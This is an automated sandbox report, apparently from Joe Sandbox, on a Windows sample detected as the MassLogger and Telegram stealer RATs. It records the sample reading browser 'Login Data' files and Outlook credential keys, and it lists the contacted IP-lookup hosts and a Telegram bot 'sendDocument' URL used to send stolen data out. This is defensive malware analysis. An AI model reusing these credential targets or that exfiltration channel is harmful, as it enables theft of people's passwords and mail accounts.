                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeQueries volume information: C:\Users\user\Desktop\rPO2400525.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected MassLogger RAT
                Source: Yara matchFile source: 0.2.rPO2400525.exe.3650f90.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.rPO2400525.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.rPO2400525.exe.3639970.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.rPO2400525.exe.3650f90.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.rPO2400525.exe.3639970.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3321986255.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2096199828.0000000003639000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: rPO2400525.exe PID: 6200, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: rPO2400525.exe PID: 2380, type: MEMORYSTR
                Yara detected Telegram RAT
                Source: Yara matchFile source: 0.2.rPO2400525.exe.3650f90.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.rPO2400525.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.rPO2400525.exe.3639970.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.rPO2400525.exe.3650f90.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.rPO2400525.exe.3639970.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3321986255.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2096199828.0000000003639000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: rPO2400525.exe PID: 6200, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: rPO2400525.exe PID: 2380, type: MEMORYSTR
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\rPO2400525.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Users\user\Desktop\rPO2400525.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected MassLogger RAT
                Source: Yara matchFile source: 0.2.rPO2400525.exe.3650f90.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.rPO2400525.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.rPO2400525.exe.3639970.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.rPO2400525.exe.3650f90.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.rPO2400525.exe.3639970.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3321986255.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2096199828.0000000003639000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: rPO2400525.exe PID: 6200, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: rPO2400525.exe PID: 2380, type: MEMORYSTR
                Yara detected Telegram RAT
                Source: Yara matchFile source: 0.2.rPO2400525.exe.3650f90.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.rPO2400525.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.rPO2400525.exe.3639970.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.rPO2400525.exe.3650f90.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.rPO2400525.exe.3639970.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3321986255.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2096199828.0000000003639000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: rPO2400525.exe PID: 6200, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: rPO2400525.exe PID: 2380, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Native API                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		11
                Disable or Modify Tools                		1
                OS Credential Dumping                		1
                File and Directory Discovery                		Remote Services11
                Archive Collected Data                		1
                Ingress Tool Transfer                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
                Process Injection                		1
                Deobfuscate/Decode Files or Information                		1
                Input Capture                		13
                System Information Discovery                		Remote Desktop Protocol1
                Data from Local System                		11
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
                Obfuscated Files or Information                		Security Account Manager1
                Query Registry                		SMB/Windows Admin Shares1
                Email Collection                		2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                Software Packing                		NTDS1
                Security Software Discovery                		Distributed Component Object Model1
                Input Capture                		13
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Timestomp                		LSA Secrets1
                Process Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain Credentials31
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Masquerading                		DCSync1
                Application Window Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                Virtualization/Sandbox Evasion                		Proc Filesystem1
                System Network Configuration Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                Process Injection                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                rPO2400525.exe24%VirustotalBrowse
                rPO2400525.exe22%ReversingLabs

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                reallyfreegeoip.org
                		104.21.64.1
                		truefalse
                  		high
                  checkip.dyndns.com
                  		193.122.130.0
                  		truefalse
                    		high
                    checkip.dyndns.org
                    		unknown
                    		unknownfalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://checkip.dyndns.org/false
                        		high
                        https://reallyfreegeoip.org/xml/8.46.123.189false
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://reallyfreegeoip.org/xml/8.46.123.189lrPO2400525.exe, 00000005.00000002.3323697493.0000000002D4E000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://checkip.dyndns.comdrPO2400525.exe, 00000005.00000002.3323697493.0000000002D4E000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://checkip.dyndns.org/qrPO2400525.exe, 00000000.00000002.2096199828.0000000003639000.00000004.00000800.00020000.00000000.sdmp, rPO2400525.exe, 00000005.00000002.3321986255.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                		high
                                http://reallyfreegeoip.orgdrPO2400525.exe, 00000005.00000002.3323697493.0000000002D6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://reallyfreegeoip.org/xml/8.46.123.189drPO2400525.exe, 00000005.00000002.3323697493.0000000002D4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://reallyfreegeoip.orgrPO2400525.exe, 00000005.00000002.3323697493.0000000002D6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://checkip.dyndns.orgdrPO2400525.exe, 00000005.00000002.3323697493.0000000002D4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://reallyfreegeoip.orgrPO2400525.exe, 00000005.00000002.3323697493.0000000002D4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://checkip.dyndns.orgrPO2400525.exe, 00000005.00000002.3323697493.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp, rPO2400525.exe, 00000005.00000002.3323697493.0000000002D43000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://checkip.dyndns.comrPO2400525.exe, 00000005.00000002.3323697493.0000000002D4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://checkip.dyndns.org/drPO2400525.exe, 00000005.00000002.3323697493.0000000002D4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namerPO2400525.exe, 00000000.00000002.2084107935.00000000027EF000.00000004.00000800.00020000.00000000.sdmp, rPO2400525.exe, 00000005.00000002.3323697493.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://api.telegram.org/bot-/sendDocument?chat_id=rPO2400525.exe, 00000000.00000002.2096199828.0000000003639000.00000004.00000800.00020000.00000000.sdmp, rPO2400525.exe, 00000005.00000002.3321986255.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://reallyfreegeoip.org/xml/rPO2400525.exe, 00000000.00000002.2096199828.0000000003639000.00000004.00000800.00020000.00000000.sdmp, rPO2400525.exe, 00000005.00000002.3321986255.0000000000402000.00000040.00000400.00020000.00000000.sdmp, rPO2400525.exe, 00000005.00000002.3323697493.0000000002D4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      193.122.130.0
                                                      		checkip.dyndns.comUnited States
                                                      		31898ORACLE-BMC-31898USfalse
                                                      104.21.64.1
                                                      		reallyfreegeoip.orgUnited States
                                                      		13335CLOUDFLARENETUSfalse

                                                      General Information

                                                      Joe Sandbox version:42.0.0 Malachite
                                                      Analysis ID:1618720
                                                      Start date and time:2025-02-19 04:00:20 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 5m 36s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:9
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:rPO2400525.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@7/6@2/2
                                                      EGA Information:
                                                      • Successful, ratio: 50%
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 89
                                                      • Number of non-executed functions: 21
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                      • Excluded IPs from analysis (whitelisted): 2.18.97.153, 13.107.246.45, 4.245.163.56
                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                      • Execution Graph export aborted for target rPO2400525.exe, PID 2380 because it is empty
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      22:01:14API Interceptor1x Sleep call for process: rPO2400525.exe modified
                                                      22:01:16API Interceptor13x Sleep call for process: powershell.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      193.122.130.0Purchase Order 77809 for acknowledgment.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • checkip.dyndns.org/
                                                      Quote_items1&2.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • checkip.dyndns.org/
                                                      AWB_5771388044 Versanddokumente.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • checkip.dyndns.org/
                                                      Swift Mesaji(1).pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                      • checkip.dyndns.org/
                                                      Purchase Order_2025.GZGet hashmaliciousDBatLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                      • checkip.dyndns.org/
                                                      INQUIRY OFFER FOR BULK SUPPLY.exeGet hashmaliciousMassLogger RATBrowse
                                                      • checkip.dyndns.org/
                                                      CUST543324_invoice.pdf.scrGet hashmaliciousMassLogger RATBrowse
                                                      • checkip.dyndns.org/
                                                      DHL AWB Document_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • checkip.dyndns.org/
                                                      useeeerrrrr.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • checkip.dyndns.org/
                                                      15300429772_20250121_09114163_HesapOzeti.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • checkip.dyndns.org/
                                                      104.21.64.1laser.ps1Get hashmaliciousFormBookBrowse
                                                      • www.lucynoel6465.shop/jgkl/
                                                      UPDATED SOA.pdf.exeGet hashmaliciousFormBookBrowse
                                                      • www.shlomi.app/t3l4/
                                                      QUOTE OF DRY DOCK REPAIR.exeGet hashmaliciousFormBookBrowse
                                                      • www.arryongro-nambe.live/ljgq/
                                                      QUOTATION NO REQ-19-000640.exeGet hashmaliciousFormBookBrowse
                                                      • www.askvtwv8.top/2875/
                                                      Revised Order Confirmation.exeGet hashmaliciousFormBookBrowse
                                                      • www.lucynoel6465.shop/hbfq/
                                                      UPIlkrNpsh.exeGet hashmaliciousUnknownBrowse
                                                      • xerecao.cc/
                                                      engine.ps1Get hashmaliciousFormBookBrowse
                                                      • www.askvtwv8.top/b8fe/
                                                      laserrrrrrrr.ps1Get hashmaliciousFormBookBrowse
                                                      • www.lucynoel6465.shop/jgkl/
                                                      new quotation.exeGet hashmaliciousFormBookBrowse
                                                      • www.shlomi.app/378r/
                                                      PO 87877889X,pdf.Vbs.vbsGet hashmaliciousFormBookBrowse
                                                      • www.lucynoel6465.shop/jgkl/

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      reallyfreegeoip.orgBAO SHUN Vessel Particulars.docx.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                      • 104.21.112.1
                                                      VSVy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 104.21.112.1
                                                      Purchase Order 77809 for acknowledgment.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 104.21.80.1
                                                      Swift Copy_18.02.2025.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 104.21.32.1
                                                      new purchase order21125.bat.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 104.21.96.1
                                                      Quote_items1&2.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 104.21.16.1
                                                      invoice packing list.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 104.21.16.1
                                                      Draft doc PI ITS15235.vbsGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                      • 104.21.32.1
                                                      customer request.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 104.21.16.1
                                                      T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 104.21.96.1
                                                      checkip.dyndns.comBAO SHUN Vessel Particulars.docx.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                      • 132.226.8.169
                                                      VSVy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 158.101.44.242
                                                      Purchase Order 77809 for acknowledgment.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 193.122.130.0
                                                      Swift Copy_18.02.2025.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 158.101.44.242
                                                      new purchase order21125.bat.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 132.226.8.169
                                                      Quote_items1&2.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 193.122.130.0
                                                      invoice packing list.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 193.122.6.168
                                                      Draft doc PI ITS15235.vbsGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                      • 132.226.8.169
                                                      customer request.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 193.122.6.168
                                                      T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 132.226.8.169

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      ORACLE-BMC-31898USVSVy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 158.101.44.242
                                                      Purchase Order 77809 for acknowledgment.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 193.122.130.0
                                                      Swift Copy_18.02.2025.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 158.101.44.242
                                                      Quote_items1&2.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 193.122.130.0
                                                      invoice packing list.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 193.122.6.168
                                                      customer request.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 193.122.6.168
                                                      CamScanner02-13-20251913.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 158.101.44.242
                                                      HUCSD23ED2025.exeGet hashmaliciousMassLogger RATBrowse
                                                      • 193.122.6.168
                                                      AWB_5771388044 Versanddokumente.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 193.122.130.0
                                                      dhl awb2846086773 G#U00f6nderinizin CFH-150(P) .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 158.101.44.242
                                                      CLOUDFLARENETUSBAO SHUN Vessel Particulars.docx.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                      • 104.21.112.1
                                                      VSVy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 104.21.112.1
                                                      #U0160iauliai.dllGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.12.205
                                                      chitanta de plata 002093940409505050960000.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 172.67.74.152
                                                      http://www.asphaltprofessionals.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                      • 172.64.146.59
                                                      https://github.com/divinusinc/Deus/releases/download/launcher/Deus.Launcher.exeGet hashmaliciousUnknownBrowse
                                                      • 172.67.214.1
                                                      https://rnicrosoft-secured-office.squarespace.com/sharepointcoc?e=bob_smith@gmail.comGet hashmaliciousHTMLPhisherBrowse
                                                      • 104.18.95.41
                                                      https://newtravels981.weebly.com/log-in-whatsapp.htmlGet hashmaliciousUnknownBrowse
                                                      • 104.18.86.42
                                                      #U5b5f#U8f69#U7f511.0 64#U4f4d.exeGet hashmaliciousUnknownBrowse
                                                      • 172.64.41.3
                                                      https://ashmithraj069.github.io/Amazon-Clone/Get hashmaliciousHTMLPhisherBrowse
                                                      • 104.17.24.14

                                                      JA3 Fingerprints

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      54328bd36c14bd82ddaa0c04b25ed9adBAO SHUN Vessel Particulars.docx.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                      • 104.21.64.1
                                                      VSVy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 104.21.64.1
                                                      Purchase Order 77809 for acknowledgment.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 104.21.64.1
                                                      Swift Copy_18.02.2025.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 104.21.64.1
                                                      new purchase order21125.bat.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 104.21.64.1
                                                      Quote_items1&2.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 104.21.64.1
                                                      invoice packing list.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 104.21.64.1
                                                      Draft doc PI ITS15235.vbsGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                      • 104.21.64.1
                                                      customer request.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 104.21.64.1
                                                      T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 104.21.64.1

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rPO2400525.exe.log

                                                      Download File
                                                      Process:C:\Users\user\Desktop\rPO2400525.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1216
                                                      Entropy (8bit):5.34331486778365
                                                      Encrypted:false
                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                      Malicious:true
                                                      Reputation:high, very likely benign file
